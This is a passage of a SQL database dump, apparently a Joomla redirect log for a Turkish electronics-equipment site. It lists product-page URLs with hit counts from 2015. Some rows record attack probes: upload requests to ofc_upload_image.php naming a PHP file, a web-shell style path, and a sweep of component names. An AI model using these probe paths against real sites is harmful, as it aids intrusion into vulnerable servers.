00:00:00',301),(7249,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/83-baslang-c-smd-hatlar&amp;sa=U&amp;ei=FI3kVJDBOpCOoQSx2IKgBA&amp;ved=0CMsDEBYwWjjIAQ&amp;usg=AFQjCNETPepiUZ_sy0jPnkBptOyJmWf64w/modules/civicrm/packag','','','',1,0,'2015-02-18 13:57:28','0000-00-00 00:00:00',301),(7250,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/83-baslang-c-smd-hatlar&amp;sa=U&amp;ei=FI3kVJDBOpCOoQSx2IKgBA&amp;ved=0CMsDEBYwWjjIAQ&amp;usg=AFQjCNETPepiUZ_sy0jPnkBptOyJmWf64w/libs/open-flash-chart/','','','',1,0,'2015-02-18 13:57:28','0000-00-00 00:00:00',301),(7251,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/83-baslang-c-smd-hatlar&amp;sa=U&amp;ei=FI3kVJDBOpCOoQSx2IKgBA&amp;ved=0CMsDEBYwWjjIAQ&amp;usg=AFQjCNETPepiUZ_sy0jPnkBptOyJmWf64w/administrator/componen','','','',1,0,'2015-02-18 13:57:28','0000-00-00 00:00:00',301),(7252,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/83-baslang-c-smd-hatlar&amp;sa=U&amp;ei=FI3kVJDBOpCOoQSx2IKgBA&amp;ved=0CMsDEBYwWjjIAQ&amp;usg=AFQjCNETPepiUZ_sy0jPnkBptOyJmWf64w/library/openflashchart','','','',1,0,'2015-02-18 13:57:32','0000-00-00 00:00:00',301),(7253,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=joss.php','','','',2,0,'2015-02-18 13:57:37','0000-00-00 00:00:00',301),(7254,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/library/openflashchart/php-ofc-library/ofc_upload_image.php?name=joss.php','','','',2,0,'2015-02-18 13:57:37','0000-00-00 00:00:00',301),(7255,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=joss.php','','','',2,0,'2015-02-18 13:57:37','0000-00-00 00:00:00',301),(7256,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=joss.php','','','',2,0,'2015-02-18 13:57:37','0000-00-00 00:00:00',301),(7257,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=joss.php','','','',2,0,'2015-02-18 13:57:37','0000-00-00 00:00:00',301),(7258,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/83-baslang-c-smd-hatlar&amp;sa=U&amp;ei=FI3kVJDBOpCOoQSx2IKgBA&amp;ved=0CMsDEBYwWjjIAQ&amp;usg=AFQjCNETPepiUZ_sy0jPnkBptOyJmWf64w/core/lib/php-ofc-libra','','','',1,0,'2015-02-18 13:57:37','0000-00-00 00:00:00',301),(7259,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=joss.php','','','',1,0,'2015-02-18 13:57:41','0000-00-00 00:00:00',301),(7260,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=joss.php','','','',1,0,'2015-02-18 13:57:47','0000-00-00 00:00:00',301),(7261,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=joss.php','','','',1,0,'2015-02-18 13:57:52','0000-00-00 00:00:00',301),(7262,'http://www.3s-technologies.com.tr/index.php?option=com_user&view=register','','http://www.3s-technologies.com.tr/index.php?option=com_user&view=register','',21,0,'2015-02-18 19:12:57','0000-00-00 00:00:00',301),(7263,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-component/images/stories/food.php?rf','','','',1,0,'2015-02-20 16:30:21','0000-00-00 00:00:00',301),(7264,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=47&Itemid=1&lang=en','','','',1,0,'2015-02-22 19:00:10','0000-00-00 00:00:00',301),(7265,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=tr','','','',2,0,'2015-02-23 02:48:36','0000-00-00 00:00:00',301),(7266,'http://www.3s-technologies.com.tr/index.php?option=com_quran','','','',1,0,'2015-02-26 01:08:29','0000-00-00 00:00:00',301),(7267,'http://www.3s-technologies.com.tr/index.php?option=com_flippingbook','','','',1,0,'2015-02-26 01:08:29','0000-00-00 00:00:00',301),(7268,'http://www.3s-technologies.com.tr/index.php?option=com_dtregister','','','',1,0,'2015-02-26 01:08:30','0000-00-00 00:00:00',301),(7269,'http://www.3s-technologies.com.tr/index.php?option=com_ezstore','','','',1,0,'2015-02-26 01:08:31','0000-00-00 00:00:00',301),(7270,'http://www.3s-technologies.com.tr/index.php?option=com_fireboard','','','',1,0,'2015-02-26 01:08:31','0000-00-00 00:00:00',301),(7271,'http://www.3s-technologies.com.tr/index.php?option=com_productbook','','','',1,0,'2015-02-26 01:08:32','0000-00-00 00:00:00',301),(7272,'http://www.3s-technologies.com.tr/index.php?option=com_gigcal','','','',1,0,'2015-02-26 01:08:32','0000-00-00 00:00:00',301),(7273,'http://www.3s-technologies.com.tr/index.php?option=com_news','','','',1,0,'2015-02-26 01:08:33','0000-00-00 00:00:00',301),(7274,'http://www.3s-technologies.com.tr/index.php?option=com_jfusion','','','',1,0,'2015-02-26 01:08:33','0000-00-00 00:00:00',301),(7275,'http://www.3s-technologies.com.tr/index.php?option=com_rsgallery2','','','',1,0,'2015-02-26 01:08:34','0000-00-00 00:00:00',301),(7276,'http://www.3s-technologies.com.tr/index.php?option=com_idoblog','','','',2,0,'2015-02-26 01:08:35','0000-00-00 00:00:00',301),(7277,'http://www.3s-technologies.com.tr/index.php?option=com_tpjobs','','','',1,0,'2015-02-26 01:08:35','0000-00-00 00:00:00',301),(7278,'http://www.3s-technologies.com.tr/index.php?catid=1:son-haberler&id=91:osai-neo&Itemid=28&lang=en&option=com_content&view=article','','','',5,0,'2015-02-26 13:37:02','0000-00-00 00:00:00',301),(7279,'http://www.3s-technologies.com.tr/index.php/tr/?catid=1:son-haberler&id=91:osai-neo&Itemid=28&lang=tr&option=com_content&view=article','','','',92,0,'2015-02-26 13:52:06','0000-00-00 00:00:00',301),(7280,'http://www.3s-technologies.com.tr/index.php/tr/?id=88&Itemid=100&lang=tr&option=com_content&view=article','','','',23,0,'2015-02-26 13:55:36','0000-00-00 00:00:00',301),(7281,'http://www.3s-technologies.com.tr/index.php/tr/?id=124&Itemid=130&lang=tr&option=com_content&view=article','','','',68,0,'2015-02-26 14:07:40','0000-00-00 00:00:00',301),(7282,'http://www.3s-technologies.com.tr/index.php/tr/?id=56&Itemid=137&lang=tr&option=com_content&view=category','','','',55,0,'2015-02-26 15:23:56','0000-00-00 00:00:00',301),(7283,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=57%3Ascreen-printer&Itemid=145&layout=default&lang=tr','','','',1,0,'2015-02-28 11:25:46','0000-00-00 00:00:00',301),(7284,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',5,0,'2015-03-03 20:54:08','0000-00-00 00:00:00',301),(7285,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php/welcome.html','','','',5,0,'2015-03-03 21:10:32','0000-00-00 00:00:00',301),(7286,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',5,0,'2015-03-03 21:23:11','0000-00-00 00:00:00',301),(7287,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/parks-home','','','',5,0,'2015-03-03 21:43:12','0000-00-00 00:00:00',301),(7288,'http://www.3s-technologies.com.tr/index.php?id=168&Itemid=58&lang=en&option=com_content&view=article','','','',9,0,'2015-03-04 16:39:20','0000-00-00 00:00:00',301),(7289,'http://www.3s-technologies.com.tr/index.php?id=44&Itemid=56&lang=tr&option=com_content&view=category','','','',7,0,'2015-03-04 16:39:42','0000-00-00 00:00:00',301),(7290,'http://www.3s-technologies.com.tr/index.php?id=90&Itemid=102&lang=en&option=com_content&view=article','','','',8,0,'2015-03-04 16:40:09','0000-00-00 00:00:00',301),(7291,'http://www.3s-technologies.com.tr/index.php?id=124&Itemid=130&lang=en&option=com_content&view=article','','','',6,0,'2015-03-04 16:40:31','0000-00-00 00:00:00',301),(7292,'http://www.3s-technologies.com.tr/index.php?id=124&Itemid=130&lang=tr&option=com_content&view=article','','','',9,0,'2015-03-04 16:42:53','0000-00-00 00:00:00',301),(7293,'http://www.3s-technologies.com.tr/index.php?id=39&Itemid=57&lang=tr&option=com_content&view=category','','','',9,0,'2015-03-04 16:44:35','0000-00-00 00:00:00',301),(7294,'http://www.3s-technologies.com.tr/index.php?id=88&Itemid=100&lang=tr&option=com_content&view=article','','','',9,0,'2015-03-04 16:45:06','0000-00-00 00:00:00',301),(7295,'http://www.3s-technologies.com.tr/index.php?id=56&Itemid=137&lang=tr&option=com_content&view=category','','','',7,0,'2015-03-04 16:45:30','0000-00-00 00:00:00',301),(7296,'http://www.3s-technologies.com.tr/index.php/tr/?id=105&Itemid=112&lang=en&option=com_content&view=article','','','',64,0,'2015-03-05 20:03:13','0000-00-00 00:00:00',301),(7297,'http://www.3s-technologies.com.tr/index.php/tr/?catid=60:ikinciel&id=172:avb1&Itemid=164&lang=en&option=com_content&view=article','','','',16,0,'2015-03-05 20:03:36','0000-00-00 00:00:00',301),(7298,'http://www.3s-technologies.com.tr/index.php/tr/?id=86&Itemid=98&lang=en&option=com_content&view=article','','','',72,0,'2015-03-05 20:06:11','0000-00-00 00:00:00',301),(7299,'http://www.3s-technologies.com.tr/index.php/tr/?id=166&Itemid=144&lang=en&option=com_content&view=article','','','',59,0,'2015-03-05 20:06:29','0000-00-00 00:00:00',301),(7300,'http://www.3s-technologies.com.tr/index.php/tr/?id=154&Itemid=156&lang=tr&option=com_content&view=article','','','',89,0,'2015-03-05 20:07:07','0000-00-00 00:00:00',301),(7301,'http://www.3s-technologies.com.tr/index.php/tr/?id=167&Itemid=163&lang=en&option=com_content&view=article','','','',49,0,'2015-03-05 20:08:45','0000-00-00 00:00:00',301),(7302,'http://www.3s-technologies.com.tr/index.php/tr/?id=55:katalog&Itemid=1&lang=tr&layout=default&option=com_content&view=category','','','',9,0,'2015-03-05 20:09:05','0000-00-00 00:00:00',301),(7303,'http://www.3s-technologies.com.tr/index.php/tr/?id=116&Itemid=127&lang=tr&option=com_content&view=article','','','',81,0,'2015-03-05 20:09:38','0000-00-00 00:00:00',301),(7304,'http://www.3s-technologies.com.tr/index.php/tr/?catid=44:pota&id=158:14fsfd&Itemid=159&lang=tr&option=com_content&view=article','','','',77,0,'2015-03-05 20:10:19','0000-00-00 00:00:00',301),(7305,'http://www.3s-technologies.com.tr/index.php/tr/?id=73&Itemid=82&lang=tr&option=com_content&view=article','','','',59,0,'2015-03-05 20:11:00','0000-00-00 00:00:00',301),(7306,'http://www.3s-technologies.com.tr/index.php/tr/?id=115&Itemid=126&lang=tr&option=com_content&view=article','','','',32,0,'2015-03-05 20:12:42','0000-00-00 00:00:00',301),(7307,'http://www.3s-technologies.com.tr/index.php/tr/?id=158&Itemid=159&lang=en&option=com_content&view=article','','','',89,0,'2015-03-05 20:14:56','0000-00-00 00:00:00',301),(7308,'http://www.3s-technologies.com.tr/index.php/tr/?id=73&Itemid=82&lang=en&option=com_content&view=article','','','',79,0,'2015-03-05 20:17:18','0000-00-00 00:00:00',301),(7309,'http://www.3s-technologies.com.tr/index.php/tr/?catid=60:ikinciel&id=174:rh61&Itemid=164&lang=en&option=com_content&view=article','','','',91,0,'2015-03-05 20:17:56','0000-00-00 00:00:00',301),(7310,'http://www.3s-technologies.com.tr/index.php/tr/?catid=41:smd-firin&id=73:ly-8c&Itemid=82&lang=en&option=com_content&view=article','','','',25,0,'2015-03-05 20:18:16','0000-00-00 00:00:00',301),(7311,'http://www.3s-technologies.com.tr/index.php/tr/?id=47&Itemid=1&lang=tr&option=com_content&view=category','','','',39,0,'2015-03-05 20:18:54','0000-00-00 00:00:00',301),(7312,'http://www.3s-technologies.com.tr/index.php/tr/?catid=60:ikinciel&id=172:avb1&Itemid=164&lang=tr&option=com_content&view=article','','','',79,0,'2015-03-05 20:21:04','0000-00-00 00:00:00',301),(7313,'http://www.3s-technologies.com.tr/index.php/tr/?id=106&Itemid=113&lang=tr&option=com_content&view=article','','','',79,0,'2015-03-05 20:22:03','0000-00-00 00:00:00',301),(7314,'http://www.3s-technologies.com.tr/index.php/tr/?catid=44:pota&id=166:lfs-1&Itemid=144&lang=en&option=com_content&view=article','','','',84,0,'2015-03-05 20:22:41','0000-00-00 00:00:00',301),(7315,'http://www.3s-technologies.com.tr/index.php/tr/?id=94&Itemid=105&lang=tr&option=com_content&view=article','','','',76,0,'2015-03-05 20:23:18','0000-00-00 00:00:00',301),(7316,'http://www.3s-technologies.com.tr/index.php/tr/?catid=44:pota&id=166:lfs-1&Itemid=144&lang=tr&option=com_content&view=article','','','',82,0,'2015-03-05 20:23:38','0000-00-00 00:00:00',301),(7317,'http://www.3s-technologies.com.tr/index.php/tr/?id=117&Itemid=128&lang=tr&option=com_content&view=article','','','',75,0,'2015-03-05 20:25:59','0000-00-00 00:00:00',301),(7318,'http://www.3s-technologies.com.tr/index.php/tr/?catid=44:pota&id=155:ct-3000n&Itemid=81&lang=en&option=com_content&view=article','','','',60,0,'2015-03-05 20:27:36','0000-00-00 00:00:00',301),(7319,'http://www.3s-technologies.com.tr/index.php/tr/?id=42:th-dizgi&Itemid=27&lang=tr&layout=default&option=com_content&view=category','','','',56,0,'2015-03-05 20:28:27','0000-00-00 00:00:00',301),(7320,'http://www.3s-technologies.com.tr/index.php/tr/?id=159&Itemid=162&lang=tr&option=com_content&view=article','','','',12,0,'2015-03-05 20:29:49','0000-00-00 00:00:00',301),(7321,'http://www.3s-technologies.com.tr/index.php/tr/?catid=44:pota&id=164:ews-310&Itemid=160&lang=tr&option=com_content&view=article','','','',70,0,'2015-03-05 20:33:32','0000-00-00 00:00:00',301),(7322,'http://www.3s-technologies.com.tr/index.php/tr/?catid=41:smd-firin&id=73:ly-8c&Itemid=82&lang=tr&option=com_content&view=article','','','',15,0,'2015-03-05 20:33:53','0000-00-00 00:00:00',301),(7323,'http://www.3s-technologies.com.tr/index.php?id=159&Itemid=162&lang=tr&option=com_content&view=article','','','',7,0,'2015-03-06 00:22:05','0000-00-00 00:00:00',301),(7324,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=105&Itemid=112&lang=tr','','','',41,0,'2015-03-07 10:41:09','0000-00-00 00:00:00',301),(7325,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=tr','','','',36,0,'2015-03-07 10:41:18','0000-00-00 00:00:00',301),(7326,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=tr','','','',39,0,'2015-03-07 10:41:24','0000-00-00 00:00:00',301),(7327,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=107&Itemid=118&lang=tr','','','',41,0,'2015-03-07 10:41:28','0000-00-00 00:00:00',301),(7328,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=tr','','','',39,0,'2015-03-07 10:41:36','0000-00-00 00:00:00',301),(7329,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=108&Itemid=119&lang=tr','','','',38,0,'2015-03-07 10:41:41','0000-00-00 00:00:00',301),(7330,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=tr','','','',39,0,'2015-03-07 10:41:44','0000-00-00 00:00:00',301),(7331,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=109&Itemid=120&lang=tr','','','',41,0,'2015-03-07 10:41:48','0000-00-00 00:00:00',301),(7332,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=tr','','','',39,0,'2015-03-07 10:41:57','0000-00-00 00:00:00',301),(7333,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=110&Itemid=121&lang=tr','','','',41,0,'2015-03-07 10:42:01','0000-00-00 00:00:00',301),(7334,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=tr','','','',36,0,'2015-03-07 10:42:11','0000-00-00 00:00:00',301),(7335,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=111&Itemid=122&lang=tr','','','',38,0,'2015-03-07 10:42:33','0000-00-00 00:00:00',301),(7336,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=tr','','','',35,0,'2015-03-07 10:50:49','0000-00-00 00:00:00',301),(7337,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=112&Itemid=123&lang=tr','','','',38,0,'2015-03-07 10:50:52','0000-00-00 00:00:00',301),(7338,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=tr','','','',35,0,'2015-03-07 10:50:56','0000-00-00 00:00:00',301),(7339,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=113&Itemid=125&lang=tr','','','',38,0,'2015-03-07 10:51:00','0000-00-00 00:00:00',301),(7340,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',41,0,'2015-03-07 10:51:04','0000-00-00 00:00:00',301),(7341,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=114&Itemid=124&lang=tr','','','',40,0,'2015-03-07 10:51:08','0000-00-00 00:00:00',301),(7342,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=tr','','','',40,0,'2015-03-07 10:51:11','0000-00-00 00:00:00',301),(7343,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=115&Itemid=126&lang=tr','','','',43,0,'2015-03-07 10:51:14','0000-00-00 00:00:00',301),(7344,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=tr','','','',41,0,'2015-03-07 10:51:20','0000-00-00 00:00:00',301),(7345,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=116&Itemid=127&lang=tr','','','',42,0,'2015-03-07 10:51:25','0000-00-00 00:00:00',301),(7346,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=tr','','','',39,0,'2015-03-07 10:51:29','0000-00-00 00:00:00',301),(7347,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=117&Itemid=128&lang=tr','','','',42,0,'2015-03-07 10:51:32','0000-00-00 00:00:00',301),(7348,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=tr','','','',39,0,'2015-03-07 10:51:35','0000-00-00 00:00:00',301),(7349,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=119&Itemid=117&lang=tr','','','',42,0,'2015-03-07 10:51:38','0000-00-00 00:00:00',301),(7350,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=tr','','','',40,0,'2015-03-07 10:51:42','0000-00-00 00:00:00',301),(7351,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=120&Itemid=116&lang=tr','','','',43,0,'2015-03-07 10:51:45','0000-00-00 00:00:00',301),(7352,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=tr','','','',40,0,'2015-03-07 10:51:49','0000-00-00 00:00:00',301),(7353,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=121&Itemid=115&lang=tr','','','',46,0,'2015-03-07 10:51:53','0000-00-00 00:00:00',301),(7354,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=tr','','','',40,0,'2015-03-07 10:51:57','0000-00-00 00:00:00',301),(7355,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=122&Itemid=129&lang=tr','','','',43,0,'2015-03-07 10:52:02','0000-00-00 00:00:00',301),(7356,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=tr','','','',40,0,'2015-03-07 10:52:06','0000-00-00 00:00:00',301),(7357,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=136&Itemid=138&lang=tr','','','',43,0,'2015-03-07 10:52:09','0000-00-00 00:00:00',301),(7358,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=tr','','','',40,0,'2015-03-07 10:52:13','0000-00-00 00:00:00',301),(7359,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',41,0,'2015-03-07 10:52:16','0000-00-00 00:00:00',301),(7360,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=tr','','','',37,0,'2015-03-07 10:52:20','0000-00-00 00:00:00',301),(7361,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=138&Itemid=140&lang=tr','','','',40,0,'2015-03-07 10:52:24','0000-00-00 00:00:00',301),(7362,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=tr','','','',38,0,'2015-03-07 10:52:27','0000-00-00 00:00:00',301),(7363,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=139&Itemid=141&lang=tr','','','',41,0,'2015-03-07 10:52:36','0000-00-00 00:00:00',301),(7364,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=tr','','','',37,0,'2015-03-07 10:52:40','0000-00-00 00:00:00',301),(7365,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=tr','','','',37,0,'2015-03-07 10:52:48','0000-00-00 00:00:00',301),(7366,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=tr','','','',37,0,'2015-03-07 10:52:56','0000-00-00 00:00:00',301),(7367,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=145&Itemid=147&lang=tr','','','',41,0,'2015-03-07 10:52:59','0000-00-00 00:00:00',301),(7368,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=tr','','','',37,0,'2015-03-07 10:53:05','0000-00-00 00:00:00',301),(7369,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=146&Itemid=148&lang=tr','','','',40,0,'2015-03-07 10:53:10','0000-00-00 00:00:00',301),(7370,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=tr','','','',37,0,'2015-03-07 10:53:14','0000-00-00 00:00:00',301),(7371,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=147&Itemid=146&lang=tr','','','',40,0,'2015-03-07 10:53:18','0000-00-00 00:00:00',301),(7372,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=149&Itemid=150&lang=tr','','','',40,0,'2015-03-07 10:53:26','0000-00-00 00:00:00',301),(7373,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','','',36,0,'2015-03-07 10:53:29','0000-00-00 00:00:00',301),(7374,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=150&Itemid=151&lang=tr','','','',43,0,'2015-03-07 10:53:32','0000-00-00 00:00:00',301),(7375,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=tr','','','',39,0,'2015-03-07 10:53:37','0000-00-00 00:00:00',301),(7376,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=151&Itemid=152&lang=tr','','','',43,0,'2015-03-07 10:53:41','0000-00-00 00:00:00',301),(7377,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=tr','','','',40,0,'2015-03-07 10:53:46','0000-00-00 00:00:00',301),(7378,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=152&Itemid=153&lang=tr','','','',44,0,'2015-03-07 10:53:51','0000-00-00 00:00:00',301),(7379,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=tr','','','',37,0,'2015-03-07 10:53:55','0000-00-00 00:00:00',301),(7380,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=153&Itemid=154&lang=tr','','','',41,0,'2015-03-07 10:53:58','0000-00-00 00:00:00',301),(7381,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=tr','','','',36,0,'2015-03-07 10:54:02','0000-00-00 00:00:00',301),(7382,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=154&Itemid=156&lang=tr','','','',40,0,'2015-03-07 10:54:05','0000-00-00 00:00:00',301),(7383,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=tr','','','',36,0,'2015-03-07 10:54:14','0000-00-00 00:00:00',301),(7384,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=tr','','','',36,0,'2015-03-07 10:54:17','0000-00-00 00:00:00',301),(7385,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=tr','','','',36,0,'2015-03-07 10:54:21','0000-00-00 00:00:00',301),(7386,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=tr','','','',36,0,'2015-03-07 10:54:24','0000-00-00 00:00:00',301),(7387,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=tr','','','',36,0,'2015-03-07 10:54:27','0000-00-00 00:00:00',301),(7388,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=159&Itemid=162&lang=tr','','','',40,0,'2015-03-07 10:54:33','0000-00-00 00:00:00',301),(7389,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=tr','','','',37,0,'2015-03-07 10:55:07','0000-00-00 00:00:00',301),(7390,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',41,0,'2015-03-07 10:55:54','0000-00-00 00:00:00',301),(7391,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=tr','','','',41,0,'2015-03-07 10:56:24','0000-00-00 00:00:00',301),(7392,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=tr','','','',38,0,'2015-03-07 10:56:36','0000-00-00 00:00:00',301),(7393,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=167&Itemid=163&lang=tr','','','',45,0,'2015-03-07 10:56:43','0000-00-00 00:00:00',301),(7394,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=tr','','','',40,0,'2015-03-07 10:56:47','0000-00-00 00:00:00',301),(7395,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=tr','','','',40,0,'2015-03-07 10:56:50','0000-00-00 